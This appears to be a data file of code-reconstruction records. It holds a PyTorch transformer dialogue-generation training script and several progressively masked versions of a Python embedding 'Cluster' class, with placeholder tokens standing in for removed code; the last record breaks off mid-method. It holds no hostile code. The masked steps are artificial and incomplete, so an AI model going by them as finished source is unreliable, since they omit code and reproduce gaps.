"step-5": "import os\r\nimport math\r\nimport time\r\nfrom tqdm import tqdm\r\nimport torch\r\nfrom torch import nn\r\nimport torch.optim as optim\r\nfrom torch.nn import functional as F\r\nfrom torch.nn.utils import clip_grad_norm_\r\nfrom torch.utils.data import DataLoader\r\n\r\nfrom nag.modules import Transformer, TransformerTorch\r\nfrom nag.logger import LogManager, SummaryHelper\r\nfrom nag.metric import BLEUMetric, DistinctNGram\r\nfrom nag.vocab_helper import VocabBulider\r\nfrom nag.utils import PadCollate, get_index, restore_best_state, init_seed\r\nfrom nag.dataset import OpenSubDataset, IMSDBDataset\r\nfrom nag.optimizer import RAdam\r\nfrom nag.options import parse_args\r\nfrom nag.criterion import similarity_regularization, LabelSmoothedCrossEntropyLoss\r\n\r\n\r\ndef train(epoch, model, dataloader, criterion, optimizer, scheduler):\r\n global global_train_step\r\n model.train()\r\n total_loss = 0.\r\n bleu_score = 0.\r\n distinct_1_score, distinct_2_score = 0., 0.\r\n for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader, 0), desc='train', total=len(opensub_dataset)//opt.realbatch):\r\n tgt_input = tgt[:, :-1]\r\n tgt_gold = tgt[:, 1:]\r\n tgt_lens = tgt_lens - 1\r\n decoder_output_probs, _ = model(\r\n src=src, tgt=tgt_input, src_lengths=src_lens, tgt_lengths=tgt_lens)\r\n decoder_output_probs_T = decoder_output_probs.permute(0, 2, 1)\r\n out_seqs = torch.argmax(decoder_output_probs, dim=2)\r\n # loss\r\n loss = criterion(decoder_output_probs_T, tgt_gold) / ACCUMULATION\r\n loss.backward()\r\n total_loss += loss.item()\r\n # calculate metrics\r\n bleu_score += bleu_metirc(tgt_gold, out_seqs, tgt_lens)\r\n distinct_1_score += distinct_1(out_seqs, tgt_lens)\r\n distinct_2_score += distinct_2(out_seqs, tgt_lens)\r\n # summary writer\r\n global_train_step += 1\r\n writer.log_loss(loss.item()*ACCUMULATION, mode='train')\r\n if (i+1) % ACCUMULATION == 0:\r\n # clip_grad_norm_(model.parameters(), max_norm=5)\r\n optimizer.step()\r\n optimizer.zero_grad()\r\n scheduler.step()\r\n if (i+1) % opt.logstep == 0:\r\n avg_loss = (total_loss / opt.logstep) * ACCUMULATION\r\n avg_bleu = bleu_score / opt.logstep\r\n avg_distinct_1 = distinct_1_score / opt.logstep\r\n avg_distinct_2 = distinct_2_score / opt.logstep\r\n mylogger.log(\r\n i, epoch, model, value=avg_loss, is_train=True,\r\n info=f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}')\r\n total_loss = 0.\r\n bleu_score = 0.\r\n distinct_1_score, distinct_2_score = 0., 0.\r\n show_gen_seq(src[:2], out_seqs[:2], tgt_lens[:2], tgt_gold[:2], vocab_bulider, global_train_step, mode='train')\r\n\r\n\r\ndef eval(epoch, model, dataloader, criterion, beam_size=2):\r\n global global_valid_step\r\n model.eval()\r\n criterion.eval()\r\n total_loss = 0.\r\n bleu_score = 0.\r\n distinct_1_score, distinct_2_score = 0., 0.\r\n fout = open(os.path.join('./save/' + model_name + '/', model_name + '_' + str(epoch)), 'w', encoding='utf-8')\r\n with torch.no_grad():\r\n for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader, 0), desc='eval', total=len(imsdb_dataset)):\r\n tgt_begin = torch.LongTensor([[vocab_bulider['<bos>']]]).to(device)\r\n tgt_gold = tgt[:, 1:]\r\n if beam_size > 1:\r\n output_seqs, output_probs = model.beam_search(\r\n src=src, tgt_begin=tgt_begin, src_length=src_lens,\r\n eos_token_id=vocab_bulider['<eos>'], beam_size=beam_size, max_length=tgt_lens.item())\r\n else:\r\n output_seqs, output_probs = model.greedy(\r\n src=src, tgt_begin=tgt_begin, src_length=src_lens,\r\n eos_token_id=vocab_bulider['<eos>'], max_length=tgt_lens.item())\r\n min_len = min(tgt_gold.shape[1], output_seqs.shape[1])\r\n # loss\r\n loss = criterion(output_probs[:, :min_len, :].permute(0, 2, 1), tgt_gold[:, :min_len])\r\n total_loss += loss.item()\r\n # calculate metrics\r\n out_lens = [min_len]\r\n bleu_score += bleu_metirc(tgt_gold, output_seqs, out_lens)\r\n distinct_1_score += distinct_1(output_seqs, out_lens)\r\n distinct_2_score += distinct_2(output_seqs, out_lens)\r\n # show sequence\r\n global_valid_step += 1\r\n fout.write(' '.join(convert_ids_to_seq(output_seqs[0], vocab_bulider)) + '\\n')\r\n if (i+1) % opt.logstep == 0:\r\n show_gen_seq(src, output_seqs, out_lens, tgt_gold, vocab_bulider, global_valid_step, mode='valid')\r\n # summary\r\n avg_loss = total_loss / i\r\n avg_bleu = bleu_score / i\r\n avg_distinct_1 = distinct_1_score / i\r\n avg_distinct_2 = distinct_2_score / i\r\n writer.log_loss(avg_loss, mode='valid')\r\n mylogger.log(\r\n i, epoch, model, value=avg_bleu, is_train=False,\r\n info=f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}')\r\n fout.close()\r\n\r\n\r\ndef run_model(model, train_loader, eval_loader, niter, criterion, optimizer, scheduler):\r\n mylogger.log_info('Running Model')\r\n for i in range(niter):\r\n mylogger.log_info(f'EPOCH: {i}, lr: {optimizer.state_dict()[\"param_groups\"][0][\"lr\"]}')\r\n train(i, model, train_loader, criterion, optimizer, scheduler)\r\n eval(i, model, eval_loader, criterion, beam_size=opt.beam)\r\n\r\n\r\ndef convert_ids_to_seq(id_seq, vocab_bulider):\r\n return [vocab_bulider.id_to_word(idx) for idx in id_seq]\r\n\r\n\r\ndef show_gen_seq(batch_in_seqs, batch_out_seqs, batch_out_lens, groud_truth, vocab_bulider, step, mode='train'):\r\n for in_id, out_id, out_len, gold_id in zip(batch_in_seqs, batch_out_seqs, batch_out_lens, groud_truth):\r\n in_seq = convert_ids_to_seq(in_id, vocab_bulider)\r\n out_seq = convert_ids_to_seq(out_id[:out_len] if out_len > 0 else out_id, vocab_bulider)\r\n gold_seq = convert_ids_to_seq(gold_id, vocab_bulider)\r\n writer.add_text(tag=mode + '_post', sentence=' '.join(in_seq[:get_index(in_seq, '<pad>')]), global_step=step)\r\n writer.add_text(tag=mode + '_pred', sentence=' '.join(out_seq), global_step=step)\r\n writer.add_text(tag=mode + '_reps', sentence=' '.join(gold_seq[:get_index(in_seq, '<pad>')]), global_step=step)\r\n\r\n\r\nif __name__ == '__main__':\r\n begin_time = time.strftime(\"%H%M%S\", time.localtime())\r\n model_name = 'transformer' + begin_time\r\n opt = parse_args()\r\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n torch.cuda.set_device(opt.gpuid)\r\n init_seed(opt.manualSeed)\r\n ACCUMULATION = opt.batchsize // opt.realbatch\r\n\r\n mylogger = LogManager(checkpoint_step=10,\r\n save_dir='./save',\r\n model_name=model_name,\r\n log_file_name=model_name + '.log',\r\n mode='max', device=device)\r\n mylogger.save_args(opt)\r\n writer = SummaryHelper(save_dir='./save', model_name=model_name)\r\n\r\n train_data_dir = './data/opensubtitles'\r\n # train_data_dir = './data/wmt15en-de'\r\n\r\n vocab_file_list = ['dialogue_length3_6.post']\r\n # vocab_file_list = ['all_de-en.bpe.post', 'all_de-en.bpe.response']\r\n vocab_bulider = VocabBulider(\r\n train_data_dir, src_files=vocab_file_list, ignore_unk_error=True,\r\n vocab_file='vocab.txt', min_count=opt.mincount, update=opt.update)\r\n print('most common 50:', vocab_bulider.most_common(50))\r\n mylogger.log_info('vocab size: %d' % len(vocab_bulider))\r\n\r\n # metircs\r\n bleu_metirc = BLEUMetric(vocab_bulider.id2vocab, ignore_smoothing_error=True)\r\n distinct_1 = DistinctNGram(ngram=1)\r\n distinct_2 = DistinctNGram(ngram=2)\r\n\r\n # train dataset and dataloader\r\n if opt.cotk: # use dataset in paper 'cotk'\r\n # opensub_file_name_list = ['all_de-en.bpe']\r\n opensub_file_name_list = ['opensub_pair_dev', 'opensub_pair_test', 'opensub_pair_train']\r\n unk_token = None\r\n else: # use dataset in paper 'Non-Autoregressive Neural Dialogue Generation'\r\n opensub_file_name_list = ['dialogue_length3_6']\r\n unk_token = 'UNknown'\r\n opensub_dataset = OpenSubDataset(\r\n data_dir=train_data_dir, vocab_bulider=vocab_bulider,\r\n file_name_list=opensub_file_name_list, unk_token='UNknown',\r\n save_process=False, samples=opt.trainsamples, add_bos=True, add_eos=True)\r\n print(opensub_dataset.sample())\r\n opensub_dataloader = DataLoader(\r\n opensub_dataset, batch_size=opt.realbatch,\r\n collate_fn=PadCollate(dim=0, pad_id=vocab_bulider.padid, device=device),\r\n shuffle=True, num_workers=opt.workers, drop_last=True)\r\n\r\n # dev set\r\n dev_data_dir = './data/imsdb'\r\n imsdb_file_name_list = ['imsdb_lower']\r\n # dev_data_dir = './data/wmt15en-de'\r\n # imsdb_file_name_list = ['newstest']\r\n imsdb_dataset = IMSDBDataset(\r\n data_dir=dev_data_dir, vocab_bulider=vocab_bulider,\r\n file_name_list=imsdb_file_name_list, save_process=False,\r\n samples=opt.validsamples, add_bos=True, add_eos=True)\r\n print(imsdb_dataset.sample())\r\n imsdb_dataloader = DataLoader(\r\n imsdb_dataset, batch_size=1,\r\n collate_fn=PadCollate(dim=0, pad_id=vocab_bulider.padid, device=device),\r\n shuffle=False, num_workers=opt.workers, drop_last=True)\r\n\r\n # model definition\r\n if opt.mine:\r\n model = Transformer(\r\n ntoken=len(vocab_bulider), d_model=opt.embedsize, nhead=opt.nhead,\r\n num_encoder_layers=opt.encoderlayer, num_decoder_layers=opt.decoderlayer,\r\n dim_feedforward=opt.feedforward, postnorm=True, dropout=opt.dropout, gumbels=opt.gumbels,\r\n use_src_mask=False, use_tgt_mask=True, use_memory_mask=False,\r\n activation='relu', use_vocab_attn=False, use_pos_attn=False,\r\n relative_clip=0, highway=False, device=device, max_sent_length=32,\r\n share_input_output_embedding=False, share_encoder_decoder_embedding=True,\r\n share_vocab_embedding=True, fix_pos_encoding=opt.fix).to(device)\r\n else:\r\n model = TransformerTorch(\r\n ntoken=len(vocab_bulider), d_model=opt.embedsize, nhead=opt.nhead,\r\n num_encoder_layers=opt.encoderlayer, num_decoder_layers=opt.decoderlayer,\r\n dim_feedforward=opt.feedforward, postnorm=True, dropout=opt.dropout, gumbels=opt.gumbels,\r\n use_src_mask=False, use_tgt_mask=False, use_memory_mask=False,\r\n activation='relu', use_vocab_attn=False, use_pos_attn=False,\r\n relative_clip=0, highway=False, device=device, max_sent_length=32,\r\n share_input_output_embedding=False, share_encoder_decoder_embedding=True,\r\n share_vocab_embedding=True, fix_pos_encoding=opt.fix).to(device)\r\n model.show_graph()\r\n if opt.half:\r\n model = model.half()\r\n if opt.ft:\r\n model = restore_best_state(model, opt.ckpt, save_dir='./save', device=model.device)\r\n\r\n # optimizer and scheduler\r\n if opt.warmup:\r\n optimizer = RAdam(\r\n filter(lambda p: p.requires_grad, model.parameters()),\r\n lr=1., betas=(opt.beta1, opt.beta2), eps=opt.eps)\r\n rate_ratio = 1. / math.sqrt(opt.embedsize)\r\n # top_lr = 1 / sqrt(d_model * warmup_step) at step == warmup_step\r\n scheduler = optim.lr_scheduler.LambdaLR(\r\n optimizer,\r\n lr_lambda=lambda step: rate_ratio * min(1. / math.sqrt(step+1), step*(opt.warmup_step**(-1.5))))\r\n else:\r\n optimizer = RAdam(\r\n filter(lambda p: p.requires_grad, model.parameters()),\r\n lr=opt.lr, betas=(opt.beta1, opt.beta2), eps=opt.eps,\r\n weight_decay=opt.weight_decay)\r\n scheduler = optim.lr_scheduler.StepLR(\r\n optimizer, step_size=opt.schedulerstep, gamma=opt.gamma)\r\n # loss function\r\n # criterion = nn.CrossEntropyLoss(ignore_index=vocab_bulider.padid) # for Transformer\r\n criterion = LabelSmoothedCrossEntropyLoss(eps=0.1, ignore_index=vocab_bulider.padid)\r\n\r\n # run model\r\n global_train_step, global_valid_step = 0, 0\r\n run_model(\r\n model, opensub_dataloader, imsdb_dataloader,\r\n opt.niter, criterion, optimizer, scheduler)\r\n writer.close()\r\n",
"step-ids": [
3,
4,
5,
6,
8
]
}
|
[
3,
4,
5,
6,
8
] |
<|reserved_special_token_0|>
class Cluster:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __len__(self):
return len(self.embeddings_dict)
def set_label(self, label):
self.label = label
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def get_embeddings_ids(self):
return self.embeddings_dict.keys()
<|reserved_special_token_0|>
def add_embedding(self, new_embedding, new_embedding_id=None, overwrite
=False):
return self.add_embeddings([new_embedding], [new_embedding_id],
overwrite)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def get_center_point(self):
return self.center_point
<|reserved_special_token_0|>
def contains_embedding(self, embedding_id):
return self.embeddings_dict.get(embedding_id) is not None
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Cluster:
<|reserved_special_token_0|>
def __init__(self, cluster_id, embeddings=None, embeddings_ids=None,
label=None, center_point=None):
"""
embeddings must be (flat) iterable of embeddings with len applicable
:param embeddings:
:param embeddings_ids:
"""
if label is None:
label = 'Unknown Person'
self.label = label
self.max_id_reducer = MaxReducer()
if embeddings is None:
self.embeddings_dict = dict()
self.num_embeddings = 0
self.center_point = None
self.max_embedding_id = 0
self.max_id_reducer(self.max_embedding_id)
else:
if embeddings_ids is None:
embeddings_ids = count(1)
self.embeddings_dict = dict(zip(embeddings_ids, embeddings))
self.num_embeddings = len(self.embeddings_dict)
if center_point is not None:
self.center_point = center_point
else:
self.center_point = self.sum_embeddings(embeddings
) / self.num_embeddings
self.max_id_reducer.process_iterable(self.embeddings_dict.keys())
self.max_embedding_id = self.max_id_reducer.get_state()
self.cluster_id = cluster_id
def __len__(self):
return len(self.embeddings_dict)
def set_label(self, label):
self.label = label
def set_cluster_id(self, cluster_id):
self.cluster_id = cluster_id
@classmethod
def set_metric(cls, metric):
cls.metric = metric
<|reserved_special_token_0|>
def get_embeddings_ids(self):
return self.embeddings_dict.keys()
def get_size(self):
return len(self.embeddings_dict)
def add_embedding(self, new_embedding, new_embedding_id=None, overwrite
=False):
return self.add_embeddings([new_embedding], [new_embedding_id],
overwrite)
def add_embeddings(self, new_embeddings, new_embeddings_ids=None,
overwrite=False):
if not new_embeddings:
return
if new_embeddings_ids is None:
next_embedding_id = self.max_embedding_id + 1
new_embeddings_ids = count(start=next_embedding_id)
new_embeddings_dict = dict(zip(new_embeddings_ids, new_embeddings))
if overwrite:
self.embeddings_dict.update(new_embeddings_dict)
else:
new_embeddings_dict.update(self.embeddings_dict)
self.embeddings_dict = new_embeddings_dict
old_num_embeddings = self.num_embeddings
self.num_embeddings = len(self.embeddings_dict)
embeddings = self.get_embeddings(as_list=True)
embeddings_sum = self.sum_embeddings(embeddings)
if self.center_point is not None:
self.center_point = (old_num_embeddings * self.center_point +
embeddings_sum) / self.num_embeddings
else:
self.center_point = embeddings_sum / self.num_embeddings
def remove_embedding_by_id(self, embedding_id):
try:
embedding = self.embeddings_dict.pop(embedding_id)
except KeyError:
log_error(f'embedding with id {embedding_id} not found.')
return
old_num_embeddings = self.num_embeddings
self.num_embeddings -= 1
try:
self.center_point = (old_num_embeddings * self.center_point -
embedding) / self.num_embeddings
except ZeroDivisionError:
self.center_point = None
def get_center_point(self):
return self.center_point
def get_embedding(self, embedding_id):
return self.embeddings_dict[embedding_id]
def contains_embedding(self, embedding_id):
return self.embeddings_dict.get(embedding_id) is not None
def compute_dist_to_center(self, embedding):
return self.compute_dist(self.center_point, embedding)
@classmethod
def compute_dist(cls, embedding1, embedding2, metric=None):
if metric is None:
metric = cls.metric
return float(torch.dist(embedding1, embedding2, p=metric))
@staticmethod
def sum_embeddings(embeddings):
return torch.sum(torch.stack(embeddings), dim=0)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
logging.basicConfig(level=logging.INFO)
class Cluster:
metric = 2
def __init__(self, cluster_id, embeddings=None, embeddings_ids=None,
label=None, center_point=None):
"""
embeddings must be (flat) iterable of embeddings with len applicable
:param embeddings:
:param embeddings_ids:
"""
if label is None:
label = 'Unknown Person'
self.label = label
self.max_id_reducer = MaxReducer()
if embeddings is None:
self.embeddings_dict = dict()
self.num_embeddings = 0
self.center_point = None
self.max_embedding_id = 0
self.max_id_reducer(self.max_embedding_id)
else:
if embeddings_ids is None:
embeddings_ids = count(1)
self.embeddings_dict = dict(zip(embeddings_ids, embeddings))
self.num_embeddings = len(self.embeddings_dict)
if center_point is not None:
self.center_point = center_point
else:
self.center_point = self.sum_embeddings(embeddings
) / self.num_embeddings
self.max_id_reducer.process_iterable(self.embeddings_dict.keys())
self.max_embedding_id = self.max_id_reducer.get_state()
self.cluster_id = cluster_id
def __len__(self):
return len(self.embeddings_dict)
def set_label(self, label):
self.label = label
def set_cluster_id(self, cluster_id):
self.cluster_id = cluster_id
@classmethod
def set_metric(cls, metric):
cls.metric = metric
def get_embeddings(self, with_embeddings_ids=False, as_dict=False,
as_list=False):
if with_embeddings_ids or as_dict:
if as_dict:
return self.embeddings_dict
return self.embeddings_dict.items()
embeddings = self.embeddings_dict.values()
if as_list:
return list(embeddings)
return embeddings
def get_embeddings_ids(self):
return self.embeddings_dict.keys()
def get_size(self):
return len(self.embeddings_dict)
def add_embedding(self, new_embedding, new_embedding_id=None, overwrite
=False):
return self.add_embeddings([new_embedding], [new_embedding_id],
overwrite)
def add_embeddings(self, new_embeddings, new_embeddings_ids=None,
overwrite=False):
if not new_embeddings:
return
if new_embeddings_ids is None:
next_embedding_id = self.max_embedding_id + 1
new_embeddings_ids = count(start=next_embedding_id)
new_embeddings_dict = dict(zip(new_embeddings_ids, new_embeddings))
if overwrite:
self.embeddings_dict.update(new_embeddings_dict)
else:
new_embeddings_dict.update(self.embeddings_dict)
self.embeddings_dict = new_embeddings_dict
old_num_embeddings = self.num_embeddings
self.num_embeddings = len(self.embeddings_dict)
embeddings = self.get_embeddings(as_list=True)
embeddings_sum = self.sum_embeddings(embeddings)
if self.center_point is not None:
self.center_point = (old_num_embeddings * self.center_point +
embeddings_sum) / self.num_embeddings
else:
self.center_point = embeddings_sum / self.num_embeddings
def remove_embedding_by_id(self, embedding_id):
try:
embedding = self.embeddings_dict.pop(embedding_id)
except KeyError:
log_error(f'embedding with id {embedding_id} not found.')
return
old_num_embeddings = self.num_embeddings
self.num_embeddings -= 1
try:
self.center_point = (old_num_embeddings * self.center_point -
embedding) / self.num_embeddings
except ZeroDivisionError:
self.center_point = None
def get_center_point(self):
return self.center_point
def get_embedding(self, embedding_id):
return self.embeddings_dict[embedding_id]
def contains_embedding(self, embedding_id):
return self.embeddings_dict.get(embedding_id) is not None
def compute_dist_to_center(self, embedding):
return self.compute_dist(self.center_point, embedding)
@classmethod
def compute_dist(cls, embedding1, embedding2, metric=None):
if metric is None:
metric = cls.metric
return float(torch.dist(embedding1, embedding2, p=metric))
@staticmethod
def sum_embeddings(embeddings):
return torch.sum(torch.stack(embeddings), dim=0)
<|reserved_special_token_1|>
from Logic.ProperLogic.helper_classes.reducer import MaxReducer
from Logic.ProperLogic.misc_helpers import log_error
import torch
from itertools import count
import logging
logging.basicConfig(level=logging.INFO)
class Cluster:
metric = 2
def __init__(self, cluster_id, embeddings=None, embeddings_ids=None,
label=None, center_point=None):
"""
embeddings must be (flat) iterable of embeddings with len applicable
:param embeddings:
:param embeddings_ids:
"""
if label is None:
label = 'Unknown Person'
self.label = label
self.max_id_reducer = MaxReducer()
if embeddings is None:
self.embeddings_dict = dict()
self.num_embeddings = 0
self.center_point = None
self.max_embedding_id = 0
self.max_id_reducer(self.max_embedding_id)
else:
if embeddings_ids is None:
embeddings_ids = count(1)
self.embeddings_dict = dict(zip(embeddings_ids, embeddings))
self.num_embeddings = len(self.embeddings_dict)
if center_point is not None:
self.center_point = center_point
else:
self.center_point = self.sum_embeddings(embeddings
) / self.num_embeddings
self.max_id_reducer.process_iterable(self.embeddings_dict.keys())
self.max_embedding_id = self.max_id_reducer.get_state()
self.cluster_id = cluster_id
def __len__(self):
return len(self.embeddings_dict)
def set_label(self, label):
self.label = label
def set_cluster_id(self, cluster_id):
self.cluster_id = cluster_id
@classmethod
def set_metric(cls, metric):
cls.metric = metric
def get_embeddings(self, with_embeddings_ids=False, as_dict=False,
as_list=False):
if with_embeddings_ids or as_dict:
if as_dict:
return self.embeddings_dict
return self.embeddings_dict.items()
embeddings = self.embeddings_dict.values()
if as_list:
return list(embeddings)
return embeddings
def get_embeddings_ids(self):
return self.embeddings_dict.keys()
def get_size(self):
return len(self.embeddings_dict)
def add_embedding(self, new_embedding, new_embedding_id=None, overwrite
=False):
return self.add_embeddings([new_embedding], [new_embedding_id],
overwrite)
def add_embeddings(self, new_embeddings, new_embeddings_ids=None,
overwrite=False):
if not new_embeddings:
return
if new_embeddings_ids is None:
next_embedding_id = self.max_embedding_id + 1
new_embeddings_ids = count(start=next_embedding_id)
new_embeddings_dict = dict(zip(new_embeddings_ids, new_embeddings))
if overwrite:
self.embeddings_dict.update(new_embeddings_dict)
else:
new_embeddings_dict.update(self.embeddings_dict)
self.embeddings_dict = new_embeddings_dict
old_num_embeddings = self.num_embeddings
self.num_embeddings = len(self.embeddings_dict)
embeddings = self.get_embeddings(as_list=True)
embeddings_sum = self.sum_embeddings(embeddings)
if self.center_point is not None:
self.center_point = (old_num_embeddings * self.center_point +
embeddings_sum) / self.num_embeddings
else:
self.center_point = embeddings_sum / self.num_embeddings
def remove_embedding_by_id(self, embedding_id):
try:
embedding = self.embeddings_dict.pop(embedding_id)
except KeyError:
log_error(f'embedding with id {embedding_id} not found.')
return
old_num_embeddings = self.num_embeddings
self.num_embeddings -= 1
try:
self.center_point = (old_num_embeddings * self.center_point -
embedding) / self.num_embeddings
except ZeroDivisionError:
self.center_point = None
def get_center_point(self):
return self.center_point
def get_embedding(self, embedding_id):
return self.embeddings_dict[embedding_id]
def contains_embedding(self, embedding_id):
return self.embeddings_dict.get(embedding_id) is not None
def compute_dist_to_center(self, embedding):
return self.compute_dist(self.center_point, embedding)
@classmethod
def compute_dist(cls, embedding1, embedding2, metric=None):
if metric is None:
metric = cls.metric
return float(torch.dist(embedding1, embedding2, p=metric))
@staticmethod
def sum_embeddings(embeddings):
return torch.sum(torch.stack(embeddings), dim=0)
<|reserved_special_token_1|>
from Logic.ProperLogic.helper_classes.reducer import MaxReducer
from Logic.ProperLogic.misc_helpers import log_error
import torch
from itertools import count
import logging
logging.basicConfig(level=logging.INFO)
class Cluster:
metric = 2
def __init__(self, cluster_id, embeddings=None, embeddings_ids=None, label=None, center_point=None):
"""
embeddings must be (flat) iterable of embeddings with len applicable
:param embeddings:
:param embeddings_ids:
"""
if label is None:
label = 'Unknown Person'
self.label = label
self.max_id_reducer = MaxReducer()
if embeddings is None:
self.embeddings_dict = dict()
self.num_embeddings = 0
self.center_point = None
self.max_embedding_id = 0
self.max_id_reducer(self.max_embedding_id)
else:
if embeddings_ids is None:
embeddings_ids = count(1)
# cast embeddings to dict
self.embeddings_dict = dict(zip(embeddings_ids, embeddings))
self.num_embeddings = len(self.embeddings_dict)
if center_point is not None:
self.center_point = center_point
else:
self.center_point = self.sum_embeddings(embeddings) / self.num_embeddings
self.max_id_reducer.process_iterable(self.embeddings_dict.keys())
self.max_embedding_id = self.max_id_reducer.get_state()
self.cluster_id = cluster_id
def __len__(self):
return len(self.embeddings_dict)
def set_label(self, label):
self.label = label
def set_cluster_id(self, cluster_id):
self.cluster_id = cluster_id
@classmethod
def set_metric(cls, metric):
cls.metric = metric
def get_embeddings(self, with_embeddings_ids=False, as_dict=False, as_list=False):
if with_embeddings_ids or as_dict:
if as_dict:
return self.embeddings_dict
return self.embeddings_dict.items()
embeddings = self.embeddings_dict.values()
if as_list:
return list(embeddings)
return embeddings
def get_embeddings_ids(self):
return self.embeddings_dict.keys()
def get_size(self):
return len(self.embeddings_dict)
def add_embedding(self, new_embedding, new_embedding_id=None, overwrite=False):
return self.add_embeddings([new_embedding], [new_embedding_id], overwrite)
def add_embeddings(self, new_embeddings, new_embeddings_ids=None, overwrite=False):
if not new_embeddings:
return
if new_embeddings_ids is None:
next_embedding_id = self.max_embedding_id + 1
new_embeddings_ids = count(start=next_embedding_id)
new_embeddings_dict = dict(zip(new_embeddings_ids, new_embeddings))
if overwrite:
self.embeddings_dict.update(new_embeddings_dict)
else:
new_embeddings_dict.update(self.embeddings_dict)
self.embeddings_dict = new_embeddings_dict
old_num_embeddings = self.num_embeddings
self.num_embeddings = len(self.embeddings_dict)
embeddings = self.get_embeddings(as_list=True)
embeddings_sum = self.sum_embeddings(embeddings)
# TODO: Check the math!!!
if self.center_point is not None:
self.center_point = (old_num_embeddings * self.center_point + embeddings_sum) / self.num_embeddings
else:
self.center_point = embeddings_sum / self.num_embeddings
def remove_embedding_by_id(self, embedding_id):
try:
embedding = self.embeddings_dict.pop(embedding_id)
except KeyError:
log_error(f'embedding with id {embedding_id} not found.')
return
old_num_embeddings = self.num_embeddings
self.num_embeddings -= 1
# TODO: Check the math!!!
# (old_center is a uniformly weighted sum of the old embeddings)
try:
self.center_point = (old_num_embeddings * self.center_point - embedding) / self.num_embeddings
except ZeroDivisionError: # num_embeddings is 0
self.center_point = None
def get_center_point(self):
return self.center_point
def get_embedding(self, embedding_id):
return self.embeddings_dict[embedding_id]
def contains_embedding(self, embedding_id):
return self.embeddings_dict.get(embedding_id) is not None
def compute_dist_to_center(self, embedding):
return self.compute_dist(self.center_point, embedding)
@classmethod
def compute_dist(cls, embedding1, embedding2, metric=None):
if metric is None:
metric = cls.metric
return float(torch.dist(embedding1, embedding2, p=metric))
@staticmethod
def sum_embeddings(embeddings):
# return reduce(torch.add, embeddings)
return torch.sum(torch.stack(embeddings), dim=0)
|
flexible
|
{
"blob_id": "265c594b12ea45a2dda12e1157e5ea040f4d6ce4",
"index": 9021,
"step-1": "<mask token>\n\n\nclass Cluster:\n <mask token>\n <mask token>\n\n def __len__(self):\n return len(self.embeddings_dict)\n\n def set_label(self, label):\n self.label = label\n <mask token>\n <mask token>\n <mask token>\n\n def get_embeddings_ids(self):\n return self.embeddings_dict.keys()\n <mask token>\n\n def add_embedding(self, new_embedding, new_embedding_id=None, overwrite\n =False):\n return self.add_embeddings([new_embedding], [new_embedding_id],\n overwrite)\n <mask token>\n <mask token>\n\n def get_center_point(self):\n return self.center_point\n <mask token>\n\n def contains_embedding(self, embedding_id):\n return self.embeddings_dict.get(embedding_id) is not None\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Cluster:\n <mask token>\n\n def __init__(self, cluster_id, embeddings=None, embeddings_ids=None,\n label=None, center_point=None):\n \"\"\"\n embeddings must be (flat) iterable of embeddings with len applicable\n :param embeddings:\n :param embeddings_ids:\n \"\"\"\n if label is None:\n label = 'Unknown Person'\n self.label = label\n self.max_id_reducer = MaxReducer()\n if embeddings is None:\n self.embeddings_dict = dict()\n self.num_embeddings = 0\n self.center_point = None\n self.max_embedding_id = 0\n self.max_id_reducer(self.max_embedding_id)\n else:\n if embeddings_ids is None:\n embeddings_ids = count(1)\n self.embeddings_dict = dict(zip(embeddings_ids, embeddings))\n self.num_embeddings = len(self.embeddings_dict)\n if center_point is not None:\n self.center_point = center_point\n else:\n self.center_point = self.sum_embeddings(embeddings\n ) / self.num_embeddings\n self.max_id_reducer.process_iterable(self.embeddings_dict.keys())\n self.max_embedding_id = self.max_id_reducer.get_state()\n self.cluster_id = cluster_id\n\n def __len__(self):\n return len(self.embeddings_dict)\n\n def set_label(self, label):\n self.label = label\n\n def set_cluster_id(self, cluster_id):\n self.cluster_id = cluster_id\n\n @classmethod\n def set_metric(cls, metric):\n cls.metric = metric\n <mask token>\n\n def get_embeddings_ids(self):\n return self.embeddings_dict.keys()\n\n def get_size(self):\n return len(self.embeddings_dict)\n\n def add_embedding(self, new_embedding, new_embedding_id=None, overwrite\n =False):\n return self.add_embeddings([new_embedding], [new_embedding_id],\n overwrite)\n\n def add_embeddings(self, new_embeddings, new_embeddings_ids=None,\n overwrite=False):\n if not new_embeddings:\n return\n if new_embeddings_ids is None:\n next_embedding_id = self.max_embedding_id + 1\n new_embeddings_ids = count(start=next_embedding_id)\n new_embeddings_dict = dict(zip(new_embeddings_ids, new_embeddings))\n if overwrite:\n self.embeddings_dict.update(new_embeddings_dict)\n else:\n new_embeddings_dict.update(self.embeddings_dict)\n self.embeddings_dict = new_embeddings_dict\n old_num_embeddings = self.num_embeddings\n self.num_embeddings = len(self.embeddings_dict)\n embeddings = self.get_embeddings(as_list=True)\n embeddings_sum = self.sum_embeddings(embeddings)\n if self.center_point is not None:\n self.center_point = (old_num_embeddings * self.center_point +\n embeddings_sum) / self.num_embeddings\n else:\n self.center_point = embeddings_sum / self.num_embeddings\n\n def remove_embedding_by_id(self, embedding_id):\n try:\n embedding = self.embeddings_dict.pop(embedding_id)\n except KeyError:\n log_error(f'embedding with id {embedding_id} not found.')\n return\n old_num_embeddings = self.num_embeddings\n self.num_embeddings -= 1\n try:\n self.center_point = (old_num_embeddings * self.center_point -\n embedding) / self.num_embeddings\n except ZeroDivisionError:\n self.center_point = None\n\n def get_center_point(self):\n return self.center_point\n\n def get_embedding(self, embedding_id):\n return self.embeddings_dict[embedding_id]\n\n def contains_embedding(self, embedding_id):\n return self.embeddings_dict.get(embedding_id) is not None\n\n def compute_dist_to_center(self, embedding):\n return self.compute_dist(self.center_point, embedding)\n\n @classmethod\n def compute_dist(cls, embedding1, embedding2, metric=None):\n if metric is None:\n metric = cls.metric\n return 